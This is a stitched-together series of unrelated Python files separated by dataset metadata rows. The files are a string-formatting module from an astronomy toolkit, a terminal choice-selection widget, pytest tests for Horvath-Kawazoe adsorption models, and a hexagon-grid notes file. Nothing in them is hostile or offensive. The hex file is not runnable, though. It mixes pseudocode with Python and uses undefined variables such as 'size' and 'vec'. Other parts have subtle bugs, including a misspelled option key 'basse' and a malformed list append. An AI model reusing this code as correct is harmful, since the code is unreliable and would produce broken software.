elif introspection.lazy_isinstance(value, "SkyCoordinate", "pts.magic.basics.coordinate"): return "skycoordinate", str_from_coordinate(value, **kwargs)
elif introspection.lazy_isinstance(value, "PixelCoordinate", "pts.magic.basics.coordinate"): return "pixelcoordinate", str_from_pixelcoordinate(value, **kwargs)
elif introspection.lazy_isinstance(value, "PhysicalCoordinate", "pts.magic.basics.coordinate"): return "physicalcoordinate", str_from_physicalcoordinate(value, **kwargs)
# Stretch
#elif introspection.lazy_isinstance(value, "SkyStretch", "pts.magic.basics.stretch"): return "skystretch", str_from_stretch(value, **kwargs)
# Extents
elif introspection.lazy_isinstance(value, "SkyExtent", "pts.magic.basics.stretch"): return "sky_extent", str_from_angle_extent(value, **kwargs)
elif introspection.lazy_isinstance(value, "PhysicalExtent", "pts.magic.basics.stretch"): return "physical_extent", str_from_quantity_extent(value, **kwargs)
elif introspection.lazy_isinstance(value, "IntegerExtent", "pts.magic.basics.vector"): return "integer_extent", str_from_integer_extent(value, **kwargs)
elif introspection.lazy_isinstance(value, "RealExtent", "pts.magic.basics.vector"): return "real_extent", str_from_real_extent(value, **kwargs)
elif introspection.lazy_isinstance(value, "AngleExtent", "pts.magic.basics.vector"): return "angle_extent", str_from_angle_extent(value, **kwargs)
elif introspection.lazy_isinstance(value, "QuantityExtent", "pts.magic.basics.vector"): return "quantity_extent", str_from_quantity_extent(value, **kwargs)
# Filter
elif introspection.lazy_isinstance(value, "Filter", "pts.core.filter.filter"): return introspection.lazy_call("stringify_filter", "pts.core.filter.filter", value, **kwargs)
# Pixelscale
elif introspection.lazy_isinstance(value, "Pixelscale", "pts.magic.basics.pixelscale"): return "pixelscale", str(value)
# Parallelization
elif introspection.lazy_isinstance(value, "Parallelization", "pts.core.simulation.parallelization"): return "parallelization", introspection.lazy_call("represent_parallelization", "pts.core.simulation.parallelization", value)
# Host
elif introspection.lazy_isinstance(value, "Host", "pts.core.remote.host"): return "host", str_from_host(value)
# Unrecognized
else:
warnings.warn("Unrecognized type: " + str(type(value)))
return None, str(value)
# -----------------------------------------------------------------
def str_from_host(host):
"""
This function ...
:param host:
:return:
"""
if host.cluster_name is not None: return host.id + ":" + host.cluster_name
else: return host.id
# -----------------------------------------------------------------
def str_from_dictionary(dictionary, **kwargs):
"""
This function ...
:param dictionary:
:param kwargs:
:return:
"""
parts = []
for key in dictionary:
value = dictionary[key]
vtype, vstring = stringify(value, **kwargs)
string = key + ": " + vstring
parts.append(string)
return ",".join(parts)
# -----------------------------------------------------------------
def stringify_string_fancy(string, **kwargs):
"""
This function ...
:param string:
:return:
"""
width = kwargs.pop("width", 100)
lines_prefix = kwargs.pop("lines_prefix", "")
from textwrap import wrap
return "string", lines_prefix + ("\n" + lines_prefix).join(wrap(string, width))
# -----------------------------------------------------------------
def stringify_list_fancy(lst, **kwargs):
"""
This function ...
:param lst:
:param kwargs:
:return:
"""
width = kwargs.pop("width", 100)
delimiter = kwargs.pop("delimiter", ", ")
lines_prefix = kwargs.pop("lines_prefix", "")
colour = kwargs.pop("colour", None)
colour_indices = kwargs.pop("colour_indices", None) # colour only certain indices
from textwrap import wrap
ptype, string = stringify(lst)
if colour is not None:
from .formatting import get_color_code, reset
code = get_color_code(colour)
if colour_indices is not None:
parts = string.split(",")
new_parts = []
for index, part in enumerate(parts):
if index in colour_indices: new_part = code + part + reset
else: new_part = part
new_parts.append(new_part)
string = ",".join(new_parts)
else: string = code + string + reset
return ptype, lines_prefix + ("\n" + lines_prefix).join(wrap(string.replace(",", delimiter), width))
# -----------------------------------------------------------------
def get_list_string_max_nvalues(lst, nvalues, **kwargs):
"""
This function ...
:param lst:
:param values:
:param kwargs:
:return:
"""
# Define string
ellipsis = ", ... , "
# Get options
delimiter = kwargs.pop("delimiter", ", ")
# Get strings
strings = get_strings(lst)
# Return
if len(lst) <= nvalues: return delimiter.join(strings)
# Add ellipses
else:
if nvalues % 2 == 0: nbegin = nend = int(0.5 * nvalues)
else:
nbegin = int(0.5 * nvalues)
nend = nvalues - nbegin
# Create string, return
return delimiter.join(strings[:nbegin]) + ellipsis + delimiter.join(strings[-nend:])
# -----------------------------------------------------------------
def stringify_paths(paths, **kwargs):
"""
This function ...
:param paths:
:param kwargs:
:return:
"""
# Get options
base = kwargs.pop("basse", None)
if base is None: return "path_list", stringify_list(paths)[1]
else:
from . import filesystem as fs
absolute_base = fs.absolute_path(base)
# Return the type and the relative paths as a string list
return "string_list", stringify_list([fs.absolute_path(path).split(absolute_base)[1] for path in paths])[1]
# -----------------------------------------------------------------
def str_from_integer(integer, **kwargs):
"""
This function ...
:param integer:
:param kwargs:
:return:
"""
# Get settings
scientific = kwargs.pop("scientific", False)
decimal_places = kwargs.pop("decimal_places", None)
fancy = kwargs.pop("fancy", False)
ndigits = kwargs.pop("ndigits", None)
unicode = kwargs.pop("unicode", False)
html = kwargs.pop("html", False)
# Check input
if ndigits is not None and ndigits < 1: raise ValueError("Number of digits cannot be smaller than 1")
if ndigits is not None and decimal_places is not None: raise ValueError("Cannot specify both number of decimal places and number of digits")
# Set ndigits and number of decimal places
if ndigits is not None:
if scientific: decimal_places = ndigits - 1
else: pass
elif decimal_places is not None:
if scientific: ndigits = decimal_places + 1
else: pass
else: decimal_places = 2 # default value for when ndigits is not specified
#print(scientific, decimal_places, ndigits)
# Scientific notation
if scientific:
if fancy:
if ndigits is not None:
power = len(str(integer)) - 1
digits = []
str_rounded = str(integer)
for i in range(ndigits):
digit = str_rounded[i]
digits.append(digit)
if html: return digits[0] + "." + "".join(digits[1:]) + " × 10<sup>" + str(power) + "</sup>"
elif unicode: return digits[0].decode("utf8") + u"." + u"".join(digits[1:]) + u" " + strings.multiplication + u" 10" + strings.superscript(power) # DOESN'T WORK??
else: return digits[0] + "." + "".join(digits[1:]) + " x 10^" + str(power)
else:
result = "{:.0e}".format(integer).replace("+", "").replace("e0", "e")
power = int(result.split("e")[1])
if html: result = result.split("e")[0] + " × 10<sup>" + str(power) + "</sup>"
elif unicode: result = result.split("e")[0].decode("utf8") + u" " + strings.multiplication + u" 10" + strings.superscript(power) # DOESN'T WORK
else: result = result.split("e")[0] + " x 10^" + str(power)
return result
else:
if ndigits is not None: decimal_places = ndigits - 1
if html: return ("{:." + str(decimal_places) + "e}").format(float(integer)).replace("+", "").replace("e0", " × 10<sup>") + "</sup>"
else: return ("{:." + str(decimal_places) + "e}").format(float(integer)).replace("+", "").replace("e0", "e")
# Not scientific
else: return str(integer)
# -----------------------------------------------------------------
#def str_from_integer_range(the_range, scientific=False, decimal_places=2, fancy=False, ndigits=None, unicode=False, **kwargs):
def str_from_integer_range(the_range, **kwargs):
"""
Thi function ...
:param the_range:
:param kwargs:
:return:
"""
min_str = str_from_integer(the_range.min, **kwargs)
max_str = str_from_integer(the_range.max, **kwargs)
return min_str + " > " + max_str
# -----------------------------------------------------------------
def str_from_real(real, **kwargs):
"""
This function ...
:param real:
:param kwargs:
:return:
"""
# Get kwargs
scientific = kwargs.pop("scientific", False)
decimal_places = kwargs.pop("decimal_places", None)
fancy = kwargs.pop("fancy", False)
ndigits = kwargs.pop("ndigits", None)
unicode = kwargs.pop("unicode", False)
doround = kwargs.pop("round", False)
html = kwargs.pop("html", False)
#print(decimal_places, ndigits)
# Check input
if ndigits is not None and ndigits < 1: raise ValueError("Number of digits cannot be smaller than 1")
if ndigits is not None and decimal_places is not None: raise ValueError("Cannot specify both number of decimal places and number of digits")
# Set ndigits and number of decimal places
if ndigits is not None:
if scientific: decimal_places = ndigits - 1
else: pass
elif decimal_places is not None:
if scientific: ndigits = decimal_places + 1
else: pass
else: decimal_places = 2 # default value for when ndigits is not specified
#print(decimal_places, ndigits)
# Scientific notation
if scientific:
# Fancy
if fancy:
if ndigits is not None:
if "e" in str(real): power = int(str(real).split("e")[1])
else: power = len(str(real).split(".")[0]) - 1
digits = []
rounded = numbers.round_to_n_significant_digits(real, ndigits)
str_rounded = str(rounded)
#print(str_rounded)
#if "." in str_rounded: enditeration = ndigits + 1
#else: enditeration = ndigits
if "." in str_rounded: str_rounded = "".join(str_rounded.split("."))
for i in range(ndigits):
digit = str_rounded[i]
#if digit == ".": continue # happens if rounded does stil contain dot
digits.append(digit)
#print("digits", digits)
if html: return digits[0] + "." + "".join(digits[1:]) + " × 10<sup>" + str(power) + "</sup>"
elif unicode: return digits[0].decode("utf8") + u"." + u"".join(digits[1:]) + u" " + strings.multiplication + u" 10" + strings.superscript(power).decode("utf8") # DOESN'T WORK??
else: return digits[0] + "." + "".join(digits[1:]) + " x 10^" + str(power)
else:
result = ("{:." + str(decimal_places) + "e}").format(real).replace("+", "").replace("e0", "e")
power = int(result.split("e")[1])
#result = result.split("e")[0].decode("utf8") + u" " + strings.multiplication + u" 10" + strings.superscript(power).decode("utf8")
#result = result.split("e")[0].decode("utf8") + u" " + strings.multiplication + u" 10" + strings.superscript(power).decode("utf8")
if html: result = result.split("e")[0] + " × 10<sup>" + str(power) + "</sup>"
elif unicode: result = result.split("e")[0].decode("utf8") + u" " + u"x" + u" 10" + strings.superscript(power).decode("utf8") # SOMETHING LIKE THIS?? DOESN'T WORK??
else: result = result.split("e")[0] + " x 10^" + str(power)
return result
else:
if ndigits is not None: decimal_places = ndigits - 1
if html: return ("{:." + str(decimal_places) + "e}").format(real).replace("+", "").replace("e0", " × 10<sup>") + "</sup>"
else: return ("{:." + str(decimal_places) + "e}").format(real).replace("+", "").replace("e0", "e")
else:
if doround:
#numbers.order_of_magnitude()
if ndigits is not None: return repr(numbers.round_to_n_significant_digits(real, ndigits))
else:
primary_ndigits = numbers.order_of_magnitude(real) + 1
ndigits = decimal_places + primary_ndigits
if ndigits < 1:
warnings.warn("The small number '" + repr(real) + "' cannot be represented with only " + str(decimal_places) + " decimal places: using scientific notation")
return str_from_real(real, scientific=True, ndigits=decimal_places+1)
else:
#print(decimal_places, primary_ndigits, ndigits)
return ("{:." + str(ndigits) + "}").format(real)
else: return repr(real)
# -----------------------------------------------------------------
#def str_from_real_range(the_range, scientific=False, decimal_places=2, fancy=False, ndigits=None, unicode=False, **kwargs):
def str_from_real_range(the_range, **kwargs):
"""
This function ...
:param the_range:
:param kwargs:
:return:
"""
min_str = str_from_real(the_range.min, **kwargs)
max_str = str_from_real(the_range.max, **kwargs)
return min_str + " > " + max_str
# -----------------------------------------------------------------
def str_from_coordinate(coordinate, **kwargs):
"""
This function ...
:param coordinate:
:param kwargs:
:return:
"""
delimiter = kwargs.pop("delimiter", ",")
# Return
return introspection.lazy_call("stringify_quantity", "pts.core.units.stringify", coordinate.ra, **kwargs)[1] + delimiter + introspection.lazy_call("stringify_quantity", "pts.core.units.stringify", coordinate.dec, **kwargs)[1]
# -----------------------------------------------------------------
def str_from_pixelcoordinate(coordinate, **kwargs):
"""
This function ...
:param coordinate:
:param kwargs:
:return:
"""
delimiter = kwargs.pop("delimiter", ",")
# Return
return repr(coordinate.x) + delimiter + repr(coordinate.y)
# -----------------------------------------------------------------
def str_from_physicalcoordinate(coordinate, **kwargs):
"""
This function ...
:param coordinate:
:param kwargs:
:return:
"""
delimiter = kwargs.pop("delimiter", ",")
# Return
return introspection.lazy_call("stringify_quantity", "pts.core.units.stringify", coordinate.x, **kwargs)[1] + delimiter + introspection.lazy_call("stringify_quantity", "pts.core.units.stringify", coordinate.y, **kwargs)[1]
# -----------------------------------------------------------------
def str_from_stretch(stretch, **kwargs):
"""
This function ...
:param stretch:
:param kwargs:
:return:
"""
delimiter = kwargs.pop("delimiter", ",")
# Return
return introspection.lazy_call("stringify_quantity", "pts.core.units.stringify", stretch.ra,
**kwargs)[1] + delimiter + introspection.lazy_call("stringify_quantity",
"pts.core.units.stringify",
stretch.dec, **kwargs)[1]
# -----------------------------------------------------------------
def str_from_angle_extent(extent, **kwargs):
"""
This function ...
:param extent:
:param kwargs:
:return:
"""
delimiter = kwargs.pop("delimiter", ",")
# Return
return str_from_angle(extent.x, **kwargs) + delimiter + str_from_angle(extent.y, **kwargs)
# -----------------------------------------------------------------
def str_from_quantity_extent(extent, **kwargs):
"""
Thisf unction ...
:param extent:
:param kwargs:
:return:
"""
delimiter = kwargs.pop("delimiter", ",")
# Return
return introspection.lazy_call("stringify_quantity", "pts.core.units.stringify", extent.x, **kwargs)[1] + delimiter + \
introspection.lazy_call("stringify_quantity", "pts.core.units.stringify", extent.y, **kwargs)[1]
# -----------------------------------------------------------------
def str_from_integer_extent(extent, **kwargs):
"""
This function ...
:param extent:
:param kwargs:
:return:
"""
delimiter = kwargs.pop("delimiter", ",")
# Return
return str_from_integer(extent.x, **kwargs) + delimiter + str_from_integer(extent.y, **kwargs)
# -----------------------------------------------------------------
def str_from_real_extent(extent, **kwargs):
"""
This function ...
:param extent:
:param kwargs:
:return:
"""
delimiter = kwargs.pop("delimiter", ",")
# Return
return str_from_real(extent.x, **kwargs) + delimiter + str_from_real(extent.y, **kwargs)
# -----------------------------------------------------------------
def yes_or_no(boolean, **kwargs):
"""
This function ...
:param boolean:
:param kwargs:
:return:
"""
# Get options
short = kwargs.pop("short", False)
answer = "yes" if boolean else "no"
if short: return answer[0]
else: return answer
# -----------------------------------------------------------------
def str_from_bool(boolean, **kwargs):
"""
This function ...
:param boolean:
:param kwargs:
:return:
"""
# Get options
lower = kwargs.pop("lower", False)
if lower: return str(boolean).lower()
else: return str(boolean)
# -----------------------------------------------------------------
def str_from_angle(angle, **kwargs):
"""
This function ...
:param angle:
:param kwargs:
:return:
"""
return str_from_real(angle.value, **kwargs) + " " + str(angle.unit).replace(" ", "")
# -----------------------------------------------------------------
| agpl-3.0 | -4,237,823,556,950,689,000 | 32.980198 | 229 | 0.577846 | false |
imdaveho/impromptu | impromptu/fields/_choices.py | 1 | 11268 | from platform import system
from ._base import Question
class ChoiceSelect(Question):
def __init__(self, name, query, choices=None, size=7,
default="", color=None, colormap=None):
super().__init__(name, query, default, color, colormap)
self._keys_in_use = [
"Enter", "ArrowUp", "ArrowDown"
]
self.widget = "choice"
self.size = size
self.choice_index = 0
self.cursor_index = 0
if choices is None:
self.choices = []
self.BOTTOM = 0
else:
self.choices = choices
self.BOTTOM = len(choices) - 1
self.overflow = len(choices) <= size
self.PADDING = 0 if self.overflow else size // 2
cursor_colormap = [(0, 0, 0), (7, 0, 0), (0, 0, 0), (0, 0, 0)]
self.config["cursor"] = (" › ", cursor_colormap)
self.config["active"] = (7, 0, 0)
self.config["inactive"] = (0, 0, 0)
def _set_config(self, n, c):
default = self.config[n]
return {
"icon": (*c, default) if type(c) is tuple else (c, default),
"cursor": (*c, default) if type(c) is tuple else (c, default),
"active": (c, default),
"inactive": (c, default),
"linespace": (c, default),
"result": (c, default),
"refresh": (c, default),
}.get(n, None)
def setup(self, icon=False, cursor=False, active=False, inactive=False,
linespace=False, result=False, refresh=False):
kwargs = {
"icon": icon,
"cursor": cursor,
"active": active,
"inactive": inactive,
"linespace": linespace,
"result": result,
"refresh": refresh,
}
super().setup(**kwargs)
def _segment_choices(self):
segment = []
length = len(self.choices)
if (length <= self.size):
segment = self.choices
else:
start = self.choice_index - self.cursor_index
finish = self.size + start
segment = self.choices[start:finish]
return segment
def _prepare_choices(self):
active = self.config["active"]
inactive = self.config["inactive"]
segment = self._segment_choices()
choices = [(c, [inactive for _ in c]) for c in segment]
cursor, cursor_cm = self.config["cursor"]
blanks = ''.join([" " for _ in cursor])
blanks_cm = [inactive for _ in cursor_cm]
render_list = []
for i, c in enumerate(choices):
render = None
choice, choice_cm = c
if i == self.cursor_index:
choice_cm = [active for _ in choice]
render = (cursor + choice, cursor_cm + choice_cm)
else:
render = (blanks + choice, blanks_cm + choice_cm)
render_list.append(render)
return render_list
def _draw_widget(self):
x, y = 0, self.linenum + 1
renderable = self._prepare_choices()
for choice in renderable:
c, cm = choice
for ch, colors in zip(c, cm):
fg, attr, bg = colors
self.cli.set_cell(x, y, ch, fg | attr, bg)
x += 1
y += 1
x = 0
return None
def _clear_widget(self):
w, h = self.cli.size()
h = self.size
for i in range(h):
y = i + self.linenum + 1
for x in range(w):
self.cli.set_cell(x, y, " ", 0, 0)
return None
def redraw_all(self):
self._clear_widget()
self._draw_widget()
self.cli.hide_cursor()
self.cli.flush()
def reset(self):
super().reset()
self.choice_index = 0
self.cursor_index = 0
def _main(self):
super()._main()
self.result = self.choices[self.choice_index]
return None
def _handle_events(self):
evt = self.pull_events()[0]
if evt["Type"] == self.cli.event("Key"):
k = evt["Key"]
if k == self.cli.key("Enter"):
self.end_signal = True
elif k == self.cli.key("ArrowUp"):
if self.cursor_index > self.PADDING:
self.cursor_index -= 1
self.choice_index -= 1
elif self.choice_index > self.PADDING:
self.choice_index -= 1
elif self.choice_index <= self.PADDING:
if self.choice_index > 0:
self.choice_index -= 1
self.cursor_index -= 1
else:
self.cursor_index = 0
elif k == self.cli.key("ArrowDown"):
if self.cursor_index < self.PADDING:
self.cursor_index += 1
self.choice_index += 1
elif self.choice_index < self.BOTTOM - self.PADDING:
if self.overflow:
self.cursor_index += 1
self.choice_index += 1
elif self.choice_index >= self.BOTTOM - self.PADDING:
if self.choice_index < self.BOTTOM:
self.choice_index += 1
self.cursor_index += 1
else:
self.choice_index = self.BOTTOM
else:
pass
elif evt["Type"] == self.cli.event("Error"):
# EventError
raise(Exception(evt["Err"]))
return None
class MultiSelect(ChoiceSelect):
def __init__(self, name, query, choices=None, size=7,
default="", color=None, colormap=None):
super().__init__(name, query, choices, size, default, color, colormap)
self._keys_in_use = [
"Enter", "ArrowLeft", "ArrowUp",
"ArrowRight", "ArrowDown", "Space",
]
self.widget = "multi-choice"
self.choices = [(c, False) for c in choices]
cursor_colormap = [(0, 0, 0), (7, 0, 0), (0, 0, 0)]
self.config["cursor"] = (" › ", cursor_colormap)
self.config["selected"] = "► " if system() == "Windows" else "◉ "
self.config["unselected"] = '○ '
def _set_config(self, n, c):
default = self.config[n]
return {
"icon": (*c, default) if type(c) is tuple else (c, default),
"cursor": (*c, default) if type(c) is tuple else (c, default),
"selected": (c, default),
"unselected": (c, default),
"active": (c, default),
"inactive": (c, default),
"linespace": (c, default),
"result": (c, default),
"refresh": (c, default),
}.get(n, None)
def setup(self, icon=False, cursor=False, selected=False, unselected=False,
active=False, inactive=False, linespace=False, result=False,
refresh=False):
kwargs = {
"icon": icon,
"cursor": cursor,
"selected": selected,
"unselected": unselected,
"active": active,
"inactive": inactive,
"linespace": linespace,
"result": result,
"refresh": refresh,
}
# have to call the base Question class
# since MultiSelect extends ChoiceSelect
# and ChoiceSelect has different kwargs
# than what the MultiSelect can accept
super(ChoiceSelect, self).setup(**kwargs)
def _prepare_choices(self):
active = self.config["active"]
inactive = self.config["inactive"]
cursor, cursor_cm = self.config["cursor"]
selected = self.config["selected"]
unselected = self.config["unselected"]
choices = self._segment_choices()
blanks = ''.join([" " for _ in cursor])
# blanks_cm = [inactive for _ in blanks] # TODO: confirm usage
render_list = []
for i, c in enumerate(choices):
render = None
choice, is_checked = c
if i == self.cursor_index:
if is_checked:
text = cursor + selected + choice
else:
text = cursor + unselected + choice
colormap = [active for _ in text]
render = (text, colormap)
else:
if is_checked:
text = blanks + selected + choice
colormap = [active for _ in text]
else:
text = blanks + unselected + choice
colormap = [inactive for _ in text]
render = (text, colormap)
render_list.append(render)
return render_list
def reset(self):
super().reset()
reset_choices = []
for c, _ in self.choices:
reset_choices.append(c, False)
self.choices = reset_choices
def _main(self):
super()._main()
self.result = [ch for ch, s in self.choices if s]
def _handle_events(self):
evt = self.pull_events()[0]
if evt["Type"] == self.cli.event("Key"):
k = evt["Key"]
if k == self.cli.key("Enter"):
self.end_signal = True
elif k == self.cli.key("ArrowUp"):
if self.cursor_index > self.PADDING:
self.cursor_index -= 1
self.choice_index -= 1
elif self.choice_index > self.PADDING:
self.choice_index -= 1
elif self.choice_index <= self.PADDING:
if self.choice_index > 0:
self.choice_index -= 1
self.cursor_index -= 1
else:
self.cursor_index = 0
elif k == self.cli.key("ArrowDown"):
if self.cursor_index < self.PADDING:
self.cursor_index += 1
self.choice_index += 1
elif self.choice_index < self.BOTTOM - self.PADDING:
if self.overflow:
self.cursor_index += 1
self.choice_index += 1
elif self.choice_index >= self.BOTTOM - self.PADDING:
if self.choice_index < self.BOTTOM:
self.choice_index += 1
self.cursor_index += 1
else:
self.choice_index = self.BOTTOM
elif k == self.cli.key("ArrowRight"):
choice, _ = self.choices[self.choice_index]
self.choices[self.choice_index] = (choice, True)
elif k == self.cli.key("ArrowLeft"):
choice, _ = self.choices[self.choice_index]
self.choices[self.choice_index] = (choice, False)
elif k == self.cli.key("Space"):
choice, marked = self.choices[self.choice_index]
self.choices[self.choice_index] = (choice, not marked)
else:
pass
elif evt["Type"] == self.cli.event("Error"):
# EventError
raise(Exception(evt["Err"]))
return None
| mit | 5,215,955,067,594,919,000 | 36.526667 | 79 | 0.483478 | false |
pauliacomi/pyGAPS | tests/characterisation/test_hk_models.py | 1 | 1365 | """
Tests relating to Horvath-Kawazoe model validation.
All functions in /calculations/models_hk.py are tested here.
The purposes are:
- testing that the "function getter" is performing as expected.
"""
import pytest
import pygaps.characterisation.models_hk as hk
import pygaps.utilities.exceptions as pgEx
@pytest.mark.characterisation
class TestHKModels():
"""Tests the HK models."""
def test_get_hk_model_string(self):
"""Just gets stored models."""
for model in hk._ADSORBENT_MODELS:
assert hk.get_hk_model(model) == hk._ADSORBENT_MODELS[model]
def test_get_hk_model_error(self):
"""Check if errors are raised."""
with pytest.raises(pgEx.ParameterError):
hk.get_hk_model('bad_model')
def test_get_hk_model_dict(self):
"""When passing a dict, we check for consistency and return the same dict."""
model_dict = dict(
molecular_diameter=0.276, # nm
polarizability=2.5E-3, # nm3
magnetic_susceptibility=1.3E-7, # nm3
surface_density=1.315E19, # molecules/m2
)
assert hk.get_hk_model(model_dict) == model_dict
# dictionary parameters should be checked
model_dict.pop('molecular_diameter')
with pytest.raises(pgEx.ParameterError):
hk.get_hk_model(model_dict)
| mit | 8,228,157,673,054,915,000 | 29.333333 | 85 | 0.645421 | false |
ZuraK/aVarCode | py_prototyping/hex.py | 1 | 7514 | # File:
# Desc:
import math;
# param: hType, hexType, 0 for Flat topped, 30 if Pointy topped
# param: center, Vector2Point, hex center
# param: radius, size of hex
# param: index, indexPoint corner of hex, 0-5
# returns: Vector2Point hex corner
def GeneratePointHEX(hType, center, radius, index):
vec[0];
angle_deg = 60 * index + hType; # 0 if Flat, 30 if Pointy
angle_rad = math.pi / 180 * angle_deg;
vec[0].x = center.x + size * cos(angle_rad);
vec[0].y = center.y + size * sin(angle_rad);
return vec;
# param: hType, hexType, 0 for Flat topped, 30 if Pointy topped
# param: center, Vector2Point, hex center
# param: radius, size of hex
# returns: Vector2[] hex corners
def GenerateVectorsHEX(hType, center, radius):
vec[0];
for val in range(6):
angle_deg = 60 * val + hType; # 0 if Flat, 30 if Pointy
angle_rad = math.pi / 180 * angle_deg;
vec[val].x = center.x + size * cos(angle_rad);
vec[val].y = center.y + size * sin(angle_rad);
return vec;
def PrintInfo():
print "=====[[ Hexagons ]]=====";
print "(00) Definitons, Equations, ";
print "(01) Storage, Tables, "
print "(02) Generation, ";
return;
# HexEdges, Indices
# A 0,1;
# B 1,2;
# C 2,3;
# D 3,4;
# E 4,5;
# F 5,0;
# HexTriangles, Indices (Index 6 as Center)
# A 6,0,1;
# B 6,1,2;
# etc
# Triangle Fan -> Center(0),First(1),Second(2), ...
# Hexagon area:
# A = ((3 sqrt 3) / 2 ) size^2
# Perimeter: 6 * size
# Slices 60 deg, 60 deg, 60 deg
# Total internal angles: 720 deg
# Internal angle: 120 deg
#
dirs:
flat
Lines: East, SouthEast, SouthWest, West, NorthWest, NorthEast
Edges: SouthEast, South, SouthWest, NorthWest, North, NorthEast
pointy
Lines: SouthEast, South, SouthWest, NorthWest, North, NorthEast
Edges: East, SouthEast, SouthWest, West, NorthWest, NorthEast
# Unicode Character 'WHITE HEXAGON' (U+2B21)
# HTML Entity (decimal) ⬡
# HTML Entity (hex) ⬡
# How to type in Microsoft Windows Alt +2B21
# UTF-8 (hex) 0xE2 0xAC 0xA1 (e2aca1)
# UTF-8 (binary) 11100010:10101100:10100001
# UTF-16 (hex) 0x2B21 (2b21)
# UTF-16 (decimal) 11,041
# UTF-32 (hex) 0x00002B21 (2B21)
# UTF-32 (decimal) 11,041
# C/C++/Java source code "\u2B21"
# Python source code u"\u2B21"
# Unicode Character 'BLACK HEXAGON' (U+2B22)
# HTML Entity (decimal) ⬢
# HTML Entity (hex) ⬢
# How to type in Microsoft Windows Alt +2B22
# UTF-8 (hex) 0xE2 0xAC 0xA2 (e2aca2)
# UTF-8 (binary) 11100010:10101100:10100010
# UTF-16 (hex) 0x2B22 (2b22)
# UTF-16 (decimal) 11,042
# UTF-32 (hex) 0x00002B22 (2b22)
# UTF-32 (decimal) 11,042
# C/C++/Java source code "\u2B22"
# Python source code u"\u2B22"
# hex grid flat, vertical orientation
# Width = HexSize * 2
# horiz = width * 3/4
# height = sqrt(3)/2 * width.
# dist vertical = height.
# hex grid pointy, horizontal orientation
# height = hxsize * 2
# vert = height * 3/4
# width = sqrt(3)/2 * height.
# dist horiz = width.
offset coords
# Pointy top Pointy top
# "odd-r" Horizontal layout "even-r" Horizontal layout
# (0,0) (1,0) (2,0) (3,0) (4,0) (0,0) (1,0) (2,0) (3,0) (4,0)
# (0,1) (1,1) (2,1) (3,1) (4,1) (0,1) (1,1) (2,1) (3,1) (4,1)
# (0,2) (1,2) (2,2) (3,2) (4,2) (0,2) (1,2) (2,2) (3,2) (4,2)
# (0,3) (1,3) (2,3) (3,3) (4,3) (0,3) (1,3) (2,3) (3,3) (4,3)
# (0,4) (1,4) (2,4) (3,4) (4,4) (0,4) (1,4) (2,4) (3,4) (4,4)
# Flat top Flat top
# "odd-q" Vertical layout "even-q" Vertical layout
# (0,0) (2,0) (4,0) (1,0) (3,0) (5,0)
# (1,0) (3,0) (5,0) (0,0) (2,0) (4,0)
# (0,1) (2,1) (4,1) (1,1) (3,1) (5,1)
# (1,1) (3,1) (4,1) (0,1) (2,1) (4,1)
# (0,2) (2,2) (4,2) (1,2) (3,2) (5,2)
# (1,2) (3,2) (5,2) (0,2) (2,2) (4,2)
cube coords
axial coords
interlaced/doubled coords
Coord conversions::
function cube_to_hex(h): # axial
var q = h.x
var r = h.z
return Hex(q, r)
function hex_to_cube(h): # axial
var x = h.q
var z = h.r
var y = -x-z
return Cube(x, y, z)
# convert cube to even-q offset
col = x
row = z + (x + (x&1)) / 2
# convert even-q offset to cube
x = col
z = row - (col + (col&1)) / 2
y = -x-z
# convert cube to odd-q offset
col = x
row = z + (x - (x&1)) / 2
# convert odd-q offset to cube
x = col
z = row - (col - (col&1)) / 2
y = -x-z
# convert cube to even-r offset
col = x + (z + (z&1)) / 2
row = z
# convert even-r offset to cube
x = col - (row + (row&1)) / 2
z = row
y = -x-z
# convert cube to odd-r offset
col = x + (z - (z&1)) / 2
row = z
# convert odd-r offset to cube
x = col - (row - (row&1)) / 2
z = row
y = -x-z
NEIGHBOURS::
>>cube<<
var directions = [
Cube(+1, -1, 0), Cube(+1, 0, -1), Cube( 0, +1, -1),
Cube(-1, +1, 0), Cube(-1, 0, +1), Cube( 0, -1, +1)
]
function cube_direction(direction):
return directions[direction]
function cube_neighbor(hex, direction):
return cube_add(hex, cube_direction(direction))
>>axial<<
var directions = [
Hex(+1, 0), Hex(+1, -1), Hex( 0, -1),
Hex(-1, 0), Hex(-1, +1), Hex( 0, +1)
]
function hex_direction(direction):
return directions[direction]
function hex_neighbor(hex, direction):
var dir = hex_direction(direction)
return Hex(hex.q + dir.q, hex.r + dir.r)
>>offset<< (4 different implementations depending on grid type)
>>odd-r<<
var directions = [
[ Hex(+1, 0), Hex( 0, -1), Hex(-1, -1),
Hex(-1, 0), Hex(-1, +1), Hex( 0, +1) ],
[ Hex(+1, 0), Hex(+1, -1), Hex( 0, -1),
Hex(-1, 0), Hex( 0, +1), Hex(+1, +1) ]
]
function offset_neighbor(hex, direction):
var parity = hex.row & 1
var dir = directions[parity][direction]
return Hex(hex.col + dir.col, hex.row + dir.row)
>>even-r<<
var directions = [
[ Hex(+1, 0), Hex(+1, -1), Hex( 0, -1),
Hex(-1, 0), Hex( 0, +1), Hex(+1, +1) ],
[ Hex(+1, 0), Hex( 0, -1), Hex(-1, -1),
Hex(-1, 0), Hex(-1, +1), Hex( 0, +1) ]
]
function offset_neighbor(hex, direction):
var parity = hex.row & 1
var dir = directions[parity][direction]
return Hex(hex.col + dir.col, hex.row + dir.row)
>>odd-q<<
var directions = [
[ Hex(+1, 0), Hex(+1, -1), Hex( 0, -1),
Hex(-1, -1), Hex(-1, 0), Hex( 0, +1) ],
[ Hex(+1, +1), Hex(+1, 0), Hex( 0, -1),
Hex(-1, 0), Hex(-1, +1), Hex( 0, +1) ]
]
function offset_neighbor(hex, direction):
var parity = hex.col & 1
var dir = directions[parity][direction]
return Hex(hex.col + dir.col, hex.row + dir.row)
>>even-q<<
var directions = [
[ Hex(+1, +1), Hex(+1, 0), Hex( 0, -1),
Hex(-1, 0), Hex(-1, +1), Hex( 0, +1) ],
[ Hex(+1, 0), Hex(+1, -1), Hex( 0, -1),
Hex(-1, -1), Hex(-1, 0), Hex( 0, +1) ]
]
function offset_neighbor(hex, direction):
var parity = hex.col & 1
var dir = directions[parity][direction]
return Hex(hex.col + dir.col, hex.row + dir.row)
>>Diagonals<<
var diagonals = [
Cube(+2, -1, -1), Cube(+1, +1, -2), Cube(-1, +2, -1),
Cube(-2, +1, +1), Cube(-1, -1, +2), Cube(+1, -2, +1)
]
function cube_diagonal_neighbor(hex, direction):
return cube_add(hex, diagonals[direction])
| gpl-2.0 | -3,974,613,827,194,157,600 | 25.090278 | 69 | 0.534602 | false |
